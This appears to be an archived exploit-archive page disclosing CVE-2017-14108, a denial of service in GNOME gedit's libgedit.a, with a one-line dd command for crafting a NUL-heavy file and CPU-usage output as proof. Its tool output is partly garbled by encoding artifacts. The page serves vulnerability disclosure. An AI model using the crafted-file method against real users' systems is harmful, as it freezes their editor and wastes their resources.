what you don't know can hurt you

libgedit.a 3.22.1 Denial Of Service

libgedit.a 3.22.1 Denial Of Service
Posted Sep 4, 2017
Authored by Hosein Askari

libgedit.a versions 3.22.1 and below suffer from a denial of service vulnerability.

tags | exploit, denial of service
advisories | CVE-2017-14108
MD5 | 29588415b913569a7b184d76849bd89c

libgedit.a 3.22.1 Denial Of Service

Change Mirror Download

whom it may concern,
################

#Title: libgedit.a mishandeling NUL blocks in gedit(GNOME text editor) | Denial of service

#CVE: CVE-2017-14108

#CWE: CWE-400

#Exploit Author: Hosein Askari

#Vendor HomePage: https://gnome.org , https://wiki.gnome.org/Apps/Gedit

#Version : All Version (3.22.1 and older version)

#Tested on: Ubuntu 16.04 (Linux 4.4.0-93-generic)

#Date: 02-09-2017

#Category: Application

#Author Mail : hosein.askari@aol.com

#Description: libgedit.a in GNOME gedit through 3.22.1 allows remote attackers to cause a denial of service (CPU consumption) for a longtime via a file(less than 100KB) that begins with many '\0' characters.

###############

#sudo echo -ne '\x68\x6f\x73\x65\x69\x6e\x20\x61\x73\x6b\x61\x72\x69' | dd conv=notrunc bs=1000 seek=100 of=craft.txt

#################

POC:

constantine@constantine:~$ pidstat -h -r -u -v -p 3107

Linux 4.4.0-93-generic (constantine) A A A U+-U*/UdegU1/UdegU+- A A A _i686_A A A (2 CPU)

#A A A A A TimeA A UIDA A A A A A PIDA A A %usr %systemA %guestA A %waitA A A %CPUA A CPUA minflt/sA majflt/sA A A A VSZA A A A RSSA A %MEM threadsA A fd-nrA Command

A 1504280041A 1000A A A A A 3107A A 16.43A A A 0.01A A A 0.00A A A 0.03A A 106.44A A A A 1A A A A 15.53A A A A A 0.00A 121296A A 38804A A 0.95A A A A A A 4A A A A A 18A gedit

constantine@constantine:~$ top

A PID USERA A A A A PRA NIA A A VIRTA A A RESA A A SHR SA %CPU %MEMA A A A TIME+ COMMANDA A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A

A 3107 constan+A 20A A 0A 128884A 38492A 28320 R 106.7A 0.9A A 0:17.76 gedit

#########################
Best Regards

Hosein Askari

Contact : hosein.askari@aol.com
Login or Register to add favorites

File Archive:

November 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    2 Files
  • 2
    Nov 2nd
    9 Files
  • 3
    Nov 3rd
    15 Files
  • 4
    Nov 4th
    90 Files
  • 5
    Nov 5th
    22 Files
  • 6
    Nov 6th
    16 Files
  • 7
    Nov 7th
    1 Files
  • 8
    Nov 8th
    1 Files
  • 9
    Nov 9th
    40 Files
  • 10
    Nov 10th
    27 Files
  • 11
    Nov 11th
    28 Files
  • 12
    Nov 12th
    13 Files
  • 13
    Nov 13th
    18 Files
  • 14
    Nov 14th
    2 Files
  • 15
    Nov 15th
    2 Files
  • 16
    Nov 16th
    29 Files
  • 17
    Nov 17th
    15 Files
  • 18
    Nov 18th
    15 Files
  • 19
    Nov 19th
    21 Files
  • 20
    Nov 20th
    16 Files
  • 21
    Nov 21st
    1 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    19 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close